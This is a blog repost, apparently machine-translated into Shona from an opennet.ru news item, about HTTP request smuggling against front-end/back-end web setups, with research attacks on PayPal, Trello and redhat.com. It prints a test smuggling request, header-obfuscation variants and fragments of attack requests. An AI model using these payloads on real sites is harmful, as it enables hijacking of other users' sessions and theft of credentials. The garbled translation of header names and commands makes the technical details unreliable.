ProHoster > Blog > internet nhau > Kurwisa kumberi-kumashure-kumashure-kumashure masisitimu kunotitendera kuti tipinde muzvikumbiro zvevechitatu

Kurwisa kumberi-kumashure-kumashure-kumashure masisitimu kunotitendera kuti tipinde muzvikumbiro zvevechitatu

Zvakazarurwa ruzivo rwekurwiswa kutsva pamasaiti anoshandisa yekumberi-yekupedzisira-kumashure-yekupedzisira modhi, senge idzo dzinomhanya kuburikidza nemukati mekutumira network, mitoro inorema kana proxies. Kurwiswa kwacho kunobvumira, nekutumira zvimwe zvikumbiro, kupinza mukati mezvimwe zvikumbiro zvinogadziriswa mushinda imwechete pakati pemberi uye backend. Nzira yakarongwa yakashandiswa zvakabudirira kuronga kurwisa kwakaita kuti zvibvirire kubvunzurudza zvigadziro zvevashandisi vebasa rePayPal, iro rakabhadhara vatsvakurudzi mari inosvika zviuru makumi mana zvemadhora sechikamu chechirongwa chekuzivisa nezvekuvapo kwekusagadzikana kusina kunyorwa. Kurwiswa uku kunoshandawo kumasaiti anoshandisa Akamai zvemukati kuendesa network.

Iyo crux yedambudziko ndeyekuti kumberi uye kumashure kunowanzo kupa mazinga akasiyana erutsigiro rweHTTP protocol, asi panguva imwe chete encapsulate zvikumbiro kubva kune vakasiyana vashandisi mune imwe chiteshi. Kuti ubatanidze kumberi kwekugamuchira zvikumbiro uye zvikumbiro zvekugadzirisa kumashure, kubatana kweTCP kwenguva refu kunotangwa, kuburikidza neayo zvikumbiro zvevashandisi zvinoparidzirwa, zvinoparidzirwa pamwe neketani imwe neimwe, yakaparadzaniswa nenzira yeHTTP protocol. Kuparadzanisa zvikumbiro, misoro "Yemukati-Kureba" (inotaridza saizi yese yedata muchikumbiro) uye "Transfer-Encoding: chunked"(inokutendera kuti utumire data muzvikamu, uchitsanangura mabhuroko emasikisi akasiyana mufomati "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0").

Dambudziko rinomuka kana iyo yekumberi ichingotsigira "Yemukati-Kureba" asi ichiregeredza "Kuendesa-Encoding: chunked" (semuenzaniso, Akamai CDN akaita izvi) kana zvinopesana. Kana Kutamisa-Encoding: chunked inotsigirwa pamativi ese, maitiro ekuita eHTTP header parsers anogona kushandiswa kurwisa (semuenzaniso, kana kumberi kunofuratira mitsara yakaita se "Transfer-Encoding: xchunked", "Transfer-Encoding: chunked ”, “Shandura-Encoding” :[tab]chunked”, "X: X[\n]Kutamisa-Encoding: chunked", "Transfer-Encoding[\n]: chunked" kana "Transfer-Encoding : chunked", uye iyo backend inobudirira kuvagadzirisa).

Muchiitiko ichi, munhu anorwisa anogona kutumira chikumbiro chine ese "Content-Length" uye "Transfer-Encoding: chunked" misoro, asi saizi mu "Content-Length" haienderane nehukuru hwechunked cheni, iyo idiki pane kukosha chaiko. Kana iyo yekumberi ikaita uye ichiendesa mberi chikumbiro zvinoenderana ne "Content-Length" uye yekumashure yakamirira kuti block ipedze zvichibva pa "Transfer-Encoding: chunked", ipapo kupera kwedata kwakavakirwa pa "Transfer-Encoding: chunked" ichaita. zvitemerwe kare uye muswe wasara wechikumbiro uyo anorwisa achava pakutanga kwechikumbiro chinotevera, i.e. munhu anorwisa achakwanisa kubatanidza data risingabvumirwe pakutanga kwechikumbiro chemumwe munhu chinopfuudzwa chinotevera.

Kurwisa kumberi-kumashure-kumashure-kumashure masisitimu kunotitendera kuti tipinde muzvikumbiro zvevechitatu

Kuti uone dambudziko mune yakashandiswa frontend-backend musanganiswa, unogona kutumira chikumbiro seizvi kuburikidza nekumberi:

POST/nezve HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Zvemukati-Kureba: 4

1
Z
Q

Dambudziko riripo kana iyo backend ikasakurumidza kugadzirisa chikumbiro uye inomirira kusvika kweyekupedzisira zero inosunga block ye chunked data. Kuti uwane cheki yakazara yakagadzirirwa chinhu chakakosha chinoedzawo nzira dzinobvira dzekuvanza iyo "Shandura-Encoding: chunked" musoro kubva kumberi.

Kuita kurwiswa chaiko kunoenderana nekugona kwenzvimbo yakarwiswa, semuenzaniso, paunenge uchirwisa Trello web application, unogona kutsiva kutanga kwekukumbira (inotsiva data senge "PUT /1/members/1234... x=x&csrf =1234&username=testzzz&bio=keke”) uye tumira meseji inosanganisira chikumbiro chepakutanga chemushandisi wechitatu uye Cookie yechokwadi inotsanangurwa mairi. Nekuda kwekurwiswa kweSaas-app.com, zvakave zvichiita kutsiva JavaScript kodhi mumhinduro nekuitsiva mune imwe yekukumbira paramita. Pakurwiswa kwe redhat.com, mubati wemukati akashandiswa kutungamira kune webhusaiti yeanorwisa (chikumbiro chefomu "POST /search?dest=../assets/idx?redir=//[email inodzivirirwa]/ HTTP/1.1").

Kushandisa iyo nzira yekuunza zvemukati network kwakaita kuti zvikwanise kungotsiva saiti yakakumbirwa nekutsiva iyo "Host:" musoro. Kurwiswa uku kunogona zvakare kushandiswa kuchetura zviri mukati memukati caching masisitimu uye kubvisa cached data yakavanzika. Iyo yepamusoro yenzira yacho yaive sangano rekurwiswa kwePayPal, izvo zvakaita kuti zvikwanise kubata mapassword akatumirwa nevashandisi panguva yekutendeseka (chikumbiro cheiframe chakagadziridzwa kuita JavaScript mumamiriro epaypal.com/us/gifts peji, ye iyo CSP (Content Security Policy) isina kushandiswa).

Sezvineiwo, muna 2005 paiva yakakurudzirwa yakanyatsofanana yekukumbira spoofing nzira iyo inokutendera iwe kukanganisa data mucaching proxies (Tomcat, squid, mod_proxy) kana kupfuura firewall ichivharira nekutsanangura akati wandei "GET" kana "POST" zvikumbiro mukati mechikamu chimwe cheHTTP.

Source: opennet.ru

Voeg